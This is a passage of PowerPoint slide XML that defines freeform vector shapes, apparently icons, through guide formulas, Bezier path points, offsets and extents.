                    <a:pt x="348" y="744"/>
                    <a:pt x="338" y="754"/>
                    <a:pt x="325" y="7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5" name="Freeform 1089">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E6B31E1-1486-4D96-8311-224881EDC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1213" y="9950450"/>
              <a:ext cx="165100" cy="76200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 194 w 396"/>
                <a:gd name="T1" fmla="*/ 182 h 182"/>
                <a:gd name="T2" fmla="*/ 5 w 396"/>
                <a:gd name="T3" fmla="*/ 36 h 182"/>
                <a:gd name="T4" fmla="*/ 18 w 396"/>
                <a:gd name="T5" fmla="*/ 5 h 182"/>
                <a:gd name="T6" fmla="*/ 48 w 396"/>
                <a:gd name="T7" fmla="*/ 18 h 182"/>
                <a:gd name="T8" fmla="*/ 194 w 396"/>
                <a:gd name="T9" fmla="*/ 136 h 182"/>
                <a:gd name="T10" fmla="*/ 348 w 396"/>
                <a:gd name="T11" fmla="*/ 18 h 182"/>
                <a:gd name="T12" fmla="*/ 379 w 396"/>
                <a:gd name="T13" fmla="*/ 6 h 182"/>
                <a:gd name="T14" fmla="*/ 391 w 396"/>
                <a:gd name="T15" fmla="*/ 36 h 182"/>
                <a:gd name="T16" fmla="*/ 194 w 396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6" h="182">
                  <a:moveTo>
                    <a:pt x="194" y="182"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="182"/>
                    <a:pt x="7" y="42"/>
                    <a:pt x="5" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="24"/>
                    <a:pt x="6" y="10"/>
                    <a:pt x="18" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="1"/>
                    <a:pt x="43" y="6"/>
                    <a:pt x="48" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="19"/>
                    <a:pt x="98" y="136"/>
                    <a:pt x="194" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="295" y="136"/>
                    <a:pt x="348" y="19"/>
                    <a:pt x="348" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="353" y="6"/>
                    <a:pt x="367" y="0"/>
                    <a:pt x="379" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="391" y="11"/>
                    <a:pt x="396" y="24"/>
                    <a:pt x="391" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="388" y="42"/>
                    <a:pt x="326" y="182"/>
                    <a:pt x="194" y="1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386" name="Freeform 1090">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42380166-61CB-4504-803B-0CAAB77F58D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025188" y="10104438"/>
              <a:ext cx="68263" cy="68263"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 82 w 163"/>
                <a:gd name="T1" fmla="*/ 163 h 163"/>
                <a:gd name="T2" fmla="*/ 0 w 163"/>
                <a:gd name="T3" fmla="*/ 81 h 163"/>
                <a:gd name="T4" fmla="*/ 82 w 163"/>
                <a:gd name="T5" fmla="*/ 0 h 163"/>
                <a:gd name="T6" fmla="*/ 163 w 163"/>
                <a:gd name="T7" fmla="*/ 81 h 163"/>
                <a:gd name="T8" fmla="*/ 82 w 163"/>
                <a:gd name="T9" fmla="*/ 163 h 163"/>
                <a:gd name="T10" fmla="*/ 82 w 163"/>
                <a:gd name="T11" fmla="*/ 46 h 163"/>
                <a:gd name="T12" fmla="*/ 46 w 163"/>
                <a:gd name="T13" fmla="*/ 81 h 163"/>
                <a:gd name="T14" fmla="*/ 82 w 163"/>
                <a:gd name="T15" fmla="*/ 117 h 163"/>
                <a:gd name="T16" fmla="*/ 117 w 163"/>
                <a:gd name="T17" fmla="*/ 81 h 163"/>
                <a:gd name="T18" fmla="*/ 82 w 163"/>
                <a:gd name="T19" fmla="*/ 4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3" h="163">
                  <a:moveTo>
                    <a:pt x="82" y="163"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="163"/>
                    <a:pt x="0" y="127"/>
                    <a:pt x="0" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="36"/>
                    <a:pt x="36" y="0"/>
                    <a:pt x="82" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="0"/>
                    <a:pt x="163" y="36"/>
                    <a:pt x="163" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="127"/>
                    <a:pt x="127" y="163"/>
                    <a:pt x="82" y="163"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="82" y="46"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="46"/>
                    <a:pt x="46" y="62"/>
                    <a:pt x="46" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="101"/>
                    <a:pt x="62" y="117"/>
                    <a:pt x="82" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="117"/>
                    <a:pt x="117" y="101"/>
                    <a:pt x="117" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="62"/>
                    <a:pt x="101" y="46"/>
                    <a:pt x="8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>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="Freeform 744">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8841EABF-5A2B-44B5-9033-9F210B879410}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3674571" y="5169755"/>
            <a:ext cx="24125" cy="132656"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 26 w 52"/>
              <a:gd name="T1" fmla="*/ 288 h 288"/>
              <a:gd name="T2" fmla="*/ 0 w 52"/>
              <a:gd name="T3" fmla="*/ 262 h 288"/>
              <a:gd name="T4" fmla="*/ 0 w 52"/>
              <a:gd name="T5" fmla="*/ 26 h 288"/>
              <a:gd name="T6" fmla="*/ 26 w 52"/>
              <a:gd name="T7" fmla="*/ 0 h 288"/>
              <a:gd name="T8" fmla="*/ 52 w 52"/>
              <a:gd name="T9" fmla="*/ 26 h 288"/>
              <a:gd name="T10" fmla="*/ 52 w 52"/>
              <a:gd name="T11" fmla="*/ 262 h 288"/>
              <a:gd name="T12" fmla="*/ 26 w 52"/>
              <a:gd name="T13" fmla="*/ 288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288">
                <a:moveTo>
                  <a:pt x="26" y="288"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="11" y="288"/>
                  <a:pt x="0" y="276"/>
                  <a:pt x="0" y="26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1" y="0"/>
                  <a:pt x="26" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40" y="0"/>
                  <a:pt x="52" y="12"/>
                  <a:pt x="52" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="262"/>
                  <a:pt x="52" y="262"/>
                  <a:pt x="52" y="262"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="276"/>
                  <a:pt x="40" y="288"/>
                  <a:pt x="26" y="28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88" name="Freeform 745">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{472D9221-1357-4B67-BAA3-A2F36B6C229C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3314577" y="5169755"/>
            <a:ext cx="742254" cy="71856"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1574 w 1599"/>
              <a:gd name="T1" fmla="*/ 156 h 156"/>
              <a:gd name="T2" fmla="*/ 26 w 1599"/>
              <a:gd name="T3" fmla="*/ 156 h 156"/>
              <a:gd name="T4" fmla="*/ 0 w 1599"/>
              <a:gd name="T5" fmla="*/ 130 h 156"/>
              <a:gd name="T6" fmla="*/ 0 w 1599"/>
              <a:gd name="T7" fmla="*/ 26 h 156"/>
              <a:gd name="T8" fmla="*/ 26 w 1599"/>
              <a:gd name="T9" fmla="*/ 0 h 156"/>
              <a:gd name="T10" fmla="*/ 52 w 1599"/>
              <a:gd name="T11" fmla="*/ 26 h 156"/>
              <a:gd name="T12" fmla="*/ 52 w 1599"/>
              <a:gd name="T13" fmla="*/ 104 h 156"/>
              <a:gd name="T14" fmla="*/ 1548 w 1599"/>
              <a:gd name="T15" fmla="*/ 104 h 156"/>
              <a:gd name="T16" fmla="*/ 1548 w 1599"/>
              <a:gd name="T17" fmla="*/ 26 h 156"/>
              <a:gd name="T18" fmla="*/ 1574 w 1599"/>
              <a:gd name="T19" fmla="*/ 0 h 156"/>
              <a:gd name="T20" fmla="*/ 1599 w 1599"/>
              <a:gd name="T21" fmla="*/ 26 h 156"/>
              <a:gd name="T22" fmla="*/ 1599 w 1599"/>
              <a:gd name="T23" fmla="*/ 130 h 156"/>
              <a:gd name="T24" fmla="*/ 1574 w 1599"/>
              <a:gd name="T25" fmla="*/ 156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99" h="156">
                <a:moveTo>
                  <a:pt x="1574" y="156"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="26" y="156"/>
                  <a:pt x="26" y="156"/>
                  <a:pt x="26" y="156"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12" y="156"/>
                  <a:pt x="0" y="145"/>
                  <a:pt x="0" y="130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40" y="0"/>
                  <a:pt x="52" y="12"/>
                  <a:pt x="52" y="26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1548" y="104"/>
                  <a:pt x="1548" y="104"/>
                  <a:pt x="1548" y="104"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1548" y="26"/>
                  <a:pt x="1548" y="26"/>
                  <a:pt x="1548" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1548" y="12"/>
                  <a:pt x="1559" y="0"/>
                  <a:pt x="1574" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1588" y="0"/>
                  <a:pt x="1599" y="12"/>
                  <a:pt x="1599" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1599" y="130"/>
                  <a:pt x="1599" y="130"/>
                  <a:pt x="1599" y="130"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1599" y="145"/>
                  <a:pt x="1588" y="156"/>
                  <a:pt x="1574" y="15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89" name="Freeform 746">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A92576B-AEE2-4FF8-96CA-FF7BAAD177E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3451895" y="5324520"/>
            <a:ext cx="467619" cy="307690"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 986 w 1012"/>
              <a:gd name="T1" fmla="*/ 671 h 671"/>
              <a:gd name="T2" fmla="*/ 960 w 1012"/>
              <a:gd name="T3" fmla="*/ 645 h 671"/>
              <a:gd name="T4" fmla="*/ 960 w 1012"/>
              <a:gd name="T5" fmla="*/ 102 h 671"/>
              <a:gd name="T6" fmla="*/ 910 w 1012"/>
              <a:gd name="T7" fmla="*/ 51 h 671"/>
              <a:gd name="T8" fmla="*/ 102 w 1012"/>
              <a:gd name="T9" fmla="*/ 51 h 671"/>
              <a:gd name="T10" fmla="*/ 52 w 1012"/>
              <a:gd name="T11" fmla="*/ 102 h 671"/>
              <a:gd name="T12" fmla="*/ 52 w 1012"/>
              <a:gd name="T13" fmla="*/ 129 h 671"/>
              <a:gd name="T14" fmla="*/ 26 w 1012"/>
              <a:gd name="T15" fmla="*/ 155 h 671"/>
              <a:gd name="T16" fmla="*/ 0 w 1012"/>
              <a:gd name="T17" fmla="*/ 129 h 671"/>
              <a:gd name="T18" fmla="*/ 0 w 1012"/>
              <a:gd name="T19" fmla="*/ 102 h 671"/>
              <a:gd name="T20" fmla="*/ 102 w 1012"/>
              <a:gd name="T21" fmla="*/ 0 h 671"/>
              <a:gd name="T22" fmla="*/ 910 w 1012"/>
              <a:gd name="T23" fmla="*/ 0 h 671"/>
              <a:gd name="T24" fmla="*/ 1012 w 1012"/>
              <a:gd name="T25" fmla="*/ 102 h 671"/>
              <a:gd name="T26" fmla="*/ 1012 w 1012"/>
              <a:gd name="T27" fmla="*/ 645 h 671"/>
              <a:gd name="T28" fmla="*/ 986 w 1012"/>
              <a:gd name="T29" fmla="*/ 671 h 6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012" h="671">
                <a:moveTo>
                  <a:pt x="986" y="671"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="972" y="671"/>
                  <a:pt x="960" y="660"/>
                  <a:pt x="960" y="645"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="960" y="102"/>
                  <a:pt x="960" y="102"/>
                  <a:pt x="960" y="102"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="960" y="74"/>
                  <a:pt x="938" y="51"/>
                  <a:pt x="910" y="51"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="102" y="51"/>
                  <a:pt x="102" y="51"/>
                  <a:pt x="102" y="51"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="74" y="51"/>
                  <a:pt x="52" y="74"/>
                  <a:pt x="52" y="102"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="129"/>
                  <a:pt x="52" y="129"/>
                  <a:pt x="52" y="129"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="144"/>
                  <a:pt x="40" y="155"/>
                  <a:pt x="26" y="155"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12" y="155"/>
                  <a:pt x="0" y="144"/>
                  <a:pt x="0" y="129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45"/>
                  <a:pt x="46" y="0"/>
                  <a:pt x="102" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="910" y="0"/>
                  <a:pt x="910" y="0"/>
                  <a:pt x="910" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="966" y="0"/>
                  <a:pt x="1012" y="45"/>
                  <a:pt x="1012" y="102"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1012" y="645"/>
                  <a:pt x="1012" y="645"/>
                  <a:pt x="1012" y="645"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1012" y="660"/>
                  <a:pt x="1001" y="671"/>
                  <a:pt x="986" y="6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0" name="Freeform 748">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C9231F3-383A-47F9-9E65-2795F92C88B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3451895" y="5401904"/>
            <a:ext cx="24125" cy="230306"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 26 w 52"/>
              <a:gd name="T1" fmla="*/ 501 h 501"/>
              <a:gd name="T2" fmla="*/ 0 w 52"/>
              <a:gd name="T3" fmla="*/ 475 h 501"/>
              <a:gd name="T4" fmla="*/ 0 w 52"/>
              <a:gd name="T5" fmla="*/ 26 h 501"/>
              <a:gd name="T6" fmla="*/ 26 w 52"/>
              <a:gd name="T7" fmla="*/ 0 h 501"/>
              <a:gd name="T8" fmla="*/ 52 w 52"/>
              <a:gd name="T9" fmla="*/ 26 h 501"/>
              <a:gd name="T10" fmla="*/ 52 w 52"/>
              <a:gd name="T11" fmla="*/ 475 h 501"/>
              <a:gd name="T12" fmla="*/ 26 w 52"/>
              <a:gd name="T13" fmla="*/ 501 h 5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501">
                <a:moveTo>
                  <a:pt x="26" y="501"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12" y="501"/>
                  <a:pt x="0" y="490"/>
                  <a:pt x="0" y="475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1"/>
                  <a:pt x="12" y="0"/>
                  <a:pt x="26" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40" y="0"/>
                  <a:pt x="52" y="11"/>
                  <a:pt x="52" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="475"/>
                  <a:pt x="52" y="475"/>
                  <a:pt x="52" y="475"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="490"/>
                  <a:pt x="40" y="501"/>
                  <a:pt x="26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1" name="Freeform 751">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC392033-636A-41CF-B2C7-35C4CDB9803C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3412926" y="5615627"/>
            <a:ext cx="545556" cy="68171"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1120 w 1176"/>
              <a:gd name="T1" fmla="*/ 149 h 149"/>
              <a:gd name="T2" fmla="*/ 56 w 1176"/>
              <a:gd name="T3" fmla="*/ 149 h 149"/>
              <a:gd name="T4" fmla="*/ 0 w 1176"/>
              <a:gd name="T5" fmla="*/ 92 h 149"/>
              <a:gd name="T6" fmla="*/ 0 w 1176"/>
              <a:gd name="T7" fmla="*/ 57 h 149"/>
              <a:gd name="T8" fmla="*/ 56 w 1176"/>
              <a:gd name="T9" fmla="*/ 0 h 149"/>
              <a:gd name="T10" fmla="*/ 1120 w 1176"/>
              <a:gd name="T11" fmla="*/ 0 h 149"/>
              <a:gd name="T12" fmla="*/ 1176 w 1176"/>
              <a:gd name="T13" fmla="*/ 57 h 149"/>
              <a:gd name="T14" fmla="*/ 1176 w 1176"/>
              <a:gd name="T15" fmla="*/ 92 h 149"/>
              <a:gd name="T16" fmla="*/ 1120 w 1176"/>
              <a:gd name="T17" fmla="*/ 149 h 149"/>
              <a:gd name="T18" fmla="*/ 56 w 1176"/>
              <a:gd name="T19" fmla="*/ 52 h 149"/>
              <a:gd name="T20" fmla="*/ 52 w 1176"/>
              <a:gd name="T21" fmla="*/ 57 h 149"/>
              <a:gd name="T22" fmla="*/ 52 w 1176"/>
              <a:gd name="T23" fmla="*/ 92 h 149"/>
              <a:gd name="T24" fmla="*/ 56 w 1176"/>
              <a:gd name="T25" fmla="*/ 97 h 149"/>
              <a:gd name="T26" fmla="*/ 1120 w 1176"/>
              <a:gd name="T27" fmla="*/ 97 h 149"/>
              <a:gd name="T28" fmla="*/ 1125 w 1176"/>
              <a:gd name="T29" fmla="*/ 92 h 149"/>
              <a:gd name="T30" fmla="*/ 1125 w 1176"/>
              <a:gd name="T31" fmla="*/ 57 h 149"/>
              <a:gd name="T32" fmla="*/ 1120 w 1176"/>
              <a:gd name="T33" fmla="*/ 52 h 149"/>
              <a:gd name="T34" fmla="*/ 56 w 1176"/>
              <a:gd name="T35" fmla="*/ 52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76" h="149">
                <a:moveTo>
                  <a:pt x="1120" y="149"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="56" y="149"/>
                  <a:pt x="56" y="149"/>
                  <a:pt x="56" y="149"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25" y="149"/>
                  <a:pt x="0" y="123"/>
                  <a:pt x="0" y="92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25"/>
                  <a:pt x="25" y="0"/>
                  <a:pt x="56" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1120" y="0"/>
                  <a:pt x="1120" y="0"/>
                  <a:pt x="1120" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1151" y="0"/>
                  <a:pt x="1176" y="25"/>
                  <a:pt x="1176" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1176" y="92"/>
                  <a:pt x="1176" y="92"/>
                  <a:pt x="1176" y="92"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1176" y="123"/>
                  <a:pt x="1151" y="149"/>
                  <a:pt x="1120" y="149"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="56" y="52"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="54" y="52"/>
                  <a:pt x="52" y="54"/>
                  <a:pt x="52" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="92"/>
                  <a:pt x="52" y="92"/>
                  <a:pt x="52" y="92"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="95"/>
                  <a:pt x="54" y="97"/>
                  <a:pt x="56" y="97"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1120" y="97"/>
                  <a:pt x="1120" y="97"/>
                  <a:pt x="1120" y="97"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1122" y="97"/>
                  <a:pt x="1125" y="95"/>
                  <a:pt x="1125" y="92"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1125" y="57"/>
                  <a:pt x="1125" y="57"/>
                  <a:pt x="1125" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1125" y="54"/>
                  <a:pt x="1122" y="52"/>
                  <a:pt x="1120" y="52"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="56" y="52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2" name="Freeform 752">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97AA6017-9CA4-4F24-8DF7-B491DE3C15F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3741373" y="4913655"/>
            <a:ext cx="79793" cy="202668"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 30 w 171"/>
              <a:gd name="T1" fmla="*/ 441 h 441"/>
              <a:gd name="T2" fmla="*/ 7 w 171"/>
              <a:gd name="T3" fmla="*/ 428 h 441"/>
              <a:gd name="T4" fmla="*/ 17 w 171"/>
              <a:gd name="T5" fmla="*/ 392 h 441"/>
              <a:gd name="T6" fmla="*/ 119 w 171"/>
              <a:gd name="T7" fmla="*/ 336 h 441"/>
              <a:gd name="T8" fmla="*/ 119 w 171"/>
              <a:gd name="T9" fmla="*/ 26 h 441"/>
              <a:gd name="T10" fmla="*/ 145 w 171"/>
              <a:gd name="T11" fmla="*/ 0 h 441"/>
              <a:gd name="T12" fmla="*/ 171 w 171"/>
              <a:gd name="T13" fmla="*/ 26 h 441"/>
              <a:gd name="T14" fmla="*/ 171 w 171"/>
              <a:gd name="T15" fmla="*/ 351 h 441"/>
              <a:gd name="T16" fmla="*/ 158 w 171"/>
              <a:gd name="T17" fmla="*/ 374 h 441"/>
              <a:gd name="T18" fmla="*/ 43 w 171"/>
              <a:gd name="T19" fmla="*/ 438 h 441"/>
              <a:gd name="T20" fmla="*/ 30 w 171"/>
              <a:gd name="T21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1" h="441">
                <a:moveTo>
                  <a:pt x="30" y="441"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="21" y="441"/>
                  <a:pt x="12" y="436"/>
                  <a:pt x="7" y="428"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="415"/>
                  <a:pt x="5" y="399"/>
                  <a:pt x="17" y="392"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119" y="336"/>
                  <a:pt x="119" y="336"/>
                  <a:pt x="119" y="336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9" y="12"/>
                  <a:pt x="131" y="0"/>
                  <a:pt x="145" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="0"/>
                  <a:pt x="171" y="12"/>
                  <a:pt x="171" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="171" y="351"/>
                  <a:pt x="171" y="351"/>
                  <a:pt x="171" y="351"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="171" y="360"/>
                  <a:pt x="166" y="369"/>
                  <a:pt x="158" y="374"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43" y="438"/>
                  <a:pt x="43" y="438"/>
                  <a:pt x="43" y="438"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="39" y="440"/>
                  <a:pt x="34" y="441"/>
                  <a:pt x="30" y="4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3" name="Freeform 753">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5379965D-433F-4648-A0C7-E132B1F9CB00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3552098" y="4917339"/>
            <a:ext cx="181853" cy="237676"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 285 w 393"/>
              <a:gd name="T1" fmla="*/ 516 h 516"/>
              <a:gd name="T2" fmla="*/ 272 w 393"/>
              <a:gd name="T3" fmla="*/ 513 h 516"/>
              <a:gd name="T4" fmla="*/ 15 w 393"/>
              <a:gd name="T5" fmla="*/ 364 h 516"/>
              <a:gd name="T6" fmla="*/ 2 w 393"/>
              <a:gd name="T7" fmla="*/ 342 h 516"/>
              <a:gd name="T8" fmla="*/ 1 w 393"/>
              <a:gd name="T9" fmla="*/ 26 h 516"/>
              <a:gd name="T10" fmla="*/ 26 w 393"/>
              <a:gd name="T11" fmla="*/ 0 h 516"/>
              <a:gd name="T12" fmla="*/ 52 w 393"/>
              <a:gd name="T13" fmla="*/ 26 h 516"/>
              <a:gd name="T14" fmla="*/ 54 w 393"/>
              <a:gd name="T15" fmla="*/ 327 h 516"/>
              <a:gd name="T16" fmla="*/ 285 w 393"/>
              <a:gd name="T17" fmla="*/ 460 h 516"/>
              <a:gd name="T18" fmla="*/ 351 w 393"/>
              <a:gd name="T19" fmla="*/ 424 h 516"/>
              <a:gd name="T20" fmla="*/ 386 w 393"/>
              <a:gd name="T21" fmla="*/ 434 h 516"/>
              <a:gd name="T22" fmla="*/ 376 w 393"/>
              <a:gd name="T23" fmla="*/ 469 h 516"/>
              <a:gd name="T24" fmla="*/ 298 w 393"/>
              <a:gd name="T25" fmla="*/ 513 h 516"/>
              <a:gd name="T26" fmla="*/ 285 w 393"/>
              <a:gd name="T2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3" h="516">
                <a:moveTo>
                  <a:pt x="285" y="516"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="281" y="516"/>
                  <a:pt x="276" y="515"/>
                  <a:pt x="272" y="513"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15" y="364"/>
                  <a:pt x="15" y="364"/>
                  <a:pt x="15" y="364"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7" y="360"/>
                  <a:pt x="2" y="351"/>
                  <a:pt x="2" y="342"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1" y="26"/>
                  <a:pt x="1" y="26"/>
                  <a:pt x="1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42" y="0"/>
                  <a:pt x="52" y="12"/>
                  <a:pt x="52" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54" y="327"/>
                  <a:pt x="54" y="327"/>
                  <a:pt x="54" y="327"/>
